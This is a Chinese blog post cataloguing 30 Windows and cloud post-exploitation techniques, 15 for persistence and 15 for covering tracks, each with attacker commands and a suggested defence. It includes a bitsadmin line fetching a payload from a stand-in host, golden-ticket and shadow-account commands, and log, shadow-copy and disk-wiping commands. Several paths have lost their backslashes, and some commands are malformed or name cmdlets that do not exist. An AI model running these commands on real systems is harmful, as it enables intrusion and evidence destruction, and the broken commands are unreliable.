内网‘幽灵’渗透实录：30个权限维持+痕迹清理，从零基础到精通，收藏这篇就够了！-CSDN博客

本文链接：https://blog.csdn.net/leah126/article/details/147592350

内网攻防，玩的就是心跳。好不容易撕开一道口子，横向渗透进去，结果呢？没几天就被蓝队发现了，之前的努力全白费！权限维持和痕迹清理，这才是决定你能否在内网“潜伏”下去的关键。别再傻乎乎地只知道删日志了，今天就来扒一扒30种“阴招”，看看你到底漏了哪一招，以及如何防住这些“暗箭”。

第一部分：权限维持：在内网“扎根”，不被轻易踢出去的15个绝招

“伪装者”计划任务：谁说定时任务一定是好人？
- 黑客伎俩：schtasks命令，大家都知道。但高明的黑客，会把定时任务伪装成系统服务，比如起个名字叫“MicrosoftEdgeUpdate”，让你以为是Edge浏览器的自动更新。一旦触发，后门就启动了。
- 命令示例：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:malware.exe" /sc hourly
- 防御反制：别光盯着那些奇奇怪怪的任务名，重点监控计划任务里那些非微软签名的程序路径！记住，签名才是王道！
“鸠占鹊巢”服务注入：把恶意代码塞进“正规军”里
- 黑客伎俩：Windows服务，哪个不是“根正苗红”？但黑客偏偏要搞事情，劫持合法服务的二进制路径，指向恶意DLL。比如，把“Print Spooler”服务给“污染”了。
- 命令示例：sc config spooler binPath= "C:WindowsSystem32mal.dll"
- 防御反制：启用服务签名验证！启用服务签名验证！启用服务签名验证！（重要的事情说三遍）。这招能有效防止“李鬼”冒充“李逵”。
“阴魂不散”注册表自启动：开机启动项，永远的“钉子户”
- 黑客伎俩：注册表，Windows的“心脏”。黑客会修改HKCUSoftwareMicrosoftWindowsCurrentVersionRun或者HKLM下的对应项，让恶意程序开机自启动。
- 隐蔽手段：用CLSID混淆键名，比如{AB3D1234-...}，让你眼花缭乱。
- 防御反制：部署注册表变更告警规则！任何对启动项的修改，都要第一时间知道！
“潜伏”启动文件夹：把“定时炸弹”藏在你每天都要打开的地方
- 黑客伎俩：把恶意快捷方式（.lnk）扔进%AppData%MicrosoftWindowsStart MenuProgramsStartup，让你每天开机都“惊喜”一下。
- 障眼法：用.url文件伪装成合法文档，迷惑性更强。
- 防御反制：限制用户目录的写入权限！别让用户随便往启动文件夹里扔东西！
“幕后黑手”WMI事件订阅：无需交互，自动触发的“定时器”
- 黑客伎俩：注册WMI事件过滤器，比如设置成用户登录时触发后门。这意味着，只要有人登录，后门就自动运行，根本不需要你手动点击！
- 脚本示例：
powershell $filterArgs = @{ EventNamespace='rootcimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" } $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }
- 防御反制：定期审计__EventFilter/__EventConsumer类！看看有没有人偷偷注册了恶意的WMI事件。
“隐身人”影子账户：在你的眼皮底下，创建一个你永远看不到的账户
- 黑客伎俩：通过修改注册表，添加一个隐藏账户。这个账户平时你看不到，但黑客可以随时用它来搞事情。
- 操作命令：
  powershell reg add "HKLMSAMSAMDomainsAccountUsers003E9" /v F /t REG_BINARY /d ...
- 防御反制：检查SAM中用户RID是否连续！不连续就说明有问题！
“金钥匙”黄金票据：有了它，整个域都是你的！
- 黑客伎俩：拿到域控的KRBTGT哈希，就能伪造TGT票据，也就是“黄金票据”。有了它，就相当于拿到了整个域的“金钥匙”，可以为所欲为！
- 生成命令：
  powershell kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt
- 防御反制：定期重置KRBTGT密码！每180天必须重置一次！这是最有效的防御手段。
“暗箱操作”ACL后门：给关键进程开个“后门”，想干啥就干啥
- 黑客伎俩：为关键进程（比如LSASS.exe）添加调试权限，这样就可以随意操控这个进程，窃取敏感信息。
- 操作命令：
  powershell Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow
- 防御反制：监控敏感进程的ACL变更！任何对关键进程权限的修改，都要高度警惕！
“狸猫换太子”DLL劫持：替换系统DLL，让你的程序“变异”
- 黑客伎俩：替换系统目录（比如C:WindowsSystem32）中未签名的DLL，或者利用DLL搜索顺序，劫持应用程序的调用链。
- 攻击优先级：系统目录下的DLL，更容易被劫持。
- 防御反制：启用DLL签名强制验证（CIG功能）！只允许加载签名过的DLL！
“乾坤大挪移”RID劫持：偷梁换柱，把低权限用户变成“管理员”
- 黑客伎俩：修改低权限用户的RID为500（管理员RID），这样就可以冒充管理员，执行各种敏感操作。
- 操作方式：通过mimikatz调整注册表F字段。
- 防御反制：检查用户SID与RID的合法性！看看有没有用户的RID是500，但SID却不是管理员的。
“借刀杀人”COM劫持：控制COM组件，间接控制你的应用程序
- 黑客伎俩：注册恶意的COM组件，劫持MMC或者Office的调用链。这样，当你使用这些应用程序时，恶意代码就会被执行。
- 注册表关键路径：HKCRCLSID{...}InprocServer32
- 防御反制：禁用未签名的COM组件加载！只允许加载受信任的COM组件。
“移花接木”Hook注入：拦截API调用，篡改网络通信
- 黑客伎俩：注入WS2_32.dll的connect函数，实现网络通信重定向。这样，你以为是在和正常的服务器通信，实际上数据已经被黑客截获或者篡改了。
- 常用工具：Detours库，可以方便地实现函数劫持。
- 防御反制：启用驱动签名验证（DSE）！确保加载的驱动都是经过签名的。
“暗度陈仓”Bits Jobs：利用BITS服务，偷偷下载恶意文件
- 黑客伎俩：利用后台智能传输服务（BITS）下载恶意负载。BITS服务通常用于Windows更新，不容易引起注意。
- 操作命令：
  powershell bitsadmin /create backdoor bitsadmin /addfile backdoor http://mal.com/payload.exe C: empsvchost.exe bitsadmin /SetNotifyCmdLine backdoor C: empsvchost.exe NULL
- 防御反制：审核BITS任务列表！看看有没有可疑的任务在偷偷下载文件。
“瞒天过海”域信任关系滥用：跨域提权，把“友军”变成“敌人”
- 黑客伎俩：在跨域信任的场景中，利用SID History属性提权。简单来说，就是把一个域的管理员权限，偷偷转移到另一个域的用户身上。
- 操作方式：使用mimikatz添加域控的SID至用户属性。
- 防御反制：禁用不必要的域信任关系！不要随便建立域信任！
“温水煮青蛙”Office宏：潜伏在Office文档里的“定时炸弹”
- 黑客伎俩：在Normal.dotm模板中嵌入恶意宏代码。这样，每次你启动Word时，恶意宏就会自动执行。
- 触发条件：用户启动Word。
- 防御反制：启用宏执行限制！只允许签名宏！或者干脆禁用宏！

第二部分：痕迹清理：抹去一切，不留痕迹的15个“障眼法”

“一键清空”Windows事件日志：眼不见为净，但真的干净了吗？
- 操作工具：wevtutil cl Security（需要管理员权限）。
- 高级对抗：使用内存注入技术，直接操作eventlog.service进程，绕过日志记录。
- 防御反制：启用日志转发至SIEM系统！本地日志可以被清空，但SIEM系统里的日志还在！
“釜底抽薪”IIS日志擦除：选择性删除，避免“一锅端”
- 日志路径：C:inetpublogsLogFilesW3SVC1。
- 清理技巧：只删除特定时间段的日志条目，避免全量删除引发怀疑。
- 防御反制：配置日志文件ACL为只读！防止被篡改！
“瞒天过海”防火墙规则恢复：复用已有规则，隐藏你的“小动作”
- 操作方式：删除新增的放行规则（netsh advfirewall firewall delete rule name="mal_rule"）。
- 高级隐蔽：复用已有规则名称（比如Remote Desktop），让你难以察觉。
- 防御反制：基线化防火墙规则并监控变更！任何对防火墙规则的修改，都要记录下来！
“时光倒流”文件时间戳伪造：让你的恶意文件看起来像系统文件一样“古老”
- 操作工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe。
- 伪造技巧：将时间戳与系统文件（比如notepad.exe）保持一致。
- 防御反制：启用文件完整性监控（FIM）！监控文件的任何修改！
“无影无踪”内存痕迹清除：彻底擦除，不留任何“蛛丝马迹”
- 技术手段：卸载恶意驱动后，调用ExAllocatePool覆盖内存区域。
- 高级工具：使用BOF（Beacon Object Files）实现无文件擦除。
- 防御反制：部署内存扫描工具（比如Elastic Endpoint）！定期扫描内存，发现可疑代码。
“不留后患”回收站绕过删除：彻底删除，不给恢复的机会
- 操作命令：del /f /q /s *.*配合shift+delete彻底清除。
- 增强手段：使用cipher /w:C:覆写磁盘空闲空间，防止数据恢复。
- 防御反制：审计敏感目录的文件删除操作！记录谁删除了什么文件！
“清理门户”预读取文件清理：删除预读取文件，抹去程序运行的“痕迹”
- 文件路径：C:WindowsPrefetch中.pf文件。
- 操作命令：定期执行del /f /q C:WindowsPrefetch*.pf。
- 防御反制：禁用预读取功能！但这可能会影响系统性能，需要谨慎评估。
“时光机失效”卷影副本删除：删除卷影副本，让数据恢复变得不可能
- 操作命令：vssadmin delete shadows /all /quiet。
- 高级对抗：在提权后优先删除卷影，防止取证恢复。
- 防御反制：限制vssadmin执行权限！不要让普通用户随意删除卷影副本。
“抹去记忆”RDP连接记录清除：删除RDP连接记录，隐藏你的“登录足迹”
- 注册表路径：HKCUSoftwareMicrosoftTerminal Server ClientServers。
- 自动化操作：编写脚本批量删除历史IP记录。
- 防御反制：启用RDP连接日志审计！记录谁在什么时间连接了RDP。
“洗心革面”浏览器历史痕迹清理：清理浏览器历史，抹去你的“上网记录”
- 操作工具：使用BrowsingHistoryView导出并删除Chrome/Firefox记录。
- 高级手段：劫持浏览器扩展，自动清理历史（比如恶意插件）。
- 防御反制：监控浏览器进程的异常行为！看看有没有插件在偷偷清理历史。
“瞒天过海”PowerShell日志绕过：隐藏执行窗口，删除日志文件
- 技术手段：通过-WindowStyle Hidden -ExecutionPolicy Bypass隐藏执行窗口。
- 日志清除：删除Microsoft-Windows-PowerShell%4Operational.evtx。
- 防御反制：启用模块日志记录（ScriptBlockLogging）！记录PowerShell脚本的执行内容。
“清理战场”WMI日志清理：删除WMI日志，抹去WMI操作的“痕迹”
- 日志路径：Applications and Services LogsMicrosoftWindowsWMI-Activity。
- 清理难点：需要停止Winmgmt服务后才能操作日志文件。
- 防御反制：启用WMI活动审计策略！记录WMI的活动。
“掩耳盗铃”Linux utmp/wtmp清理：删除登录记录，伪装成“从未登录过”
- 关键文件：/var/run/utmp、/var/log/wtmp。
- 操作工具：使用utmpdump工具编辑登录记录。
- 防御反制：配置ttylog实时记录会话内容！
“斩草除根”数据库日志截断：删除数据库日志，防止数据泄露
- MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';
- MSSQL：执行EXEC sp_cycle_errorlog;循环日志文件。
- 防御反制：启用数据库审计并异地存储日志！
“移花接木”云平台日志覆盖：删除云平台日志，掩盖云上的“犯罪现场”
- AWS：通过DeleteLogGroup删除CloudTrail日志组。
- Azure：使用Remove-AzLogProfile清除活动日志配置。
- 防御反制：启用云日志不可变性（Immutable Storage）！防止日志被篡改或者删除。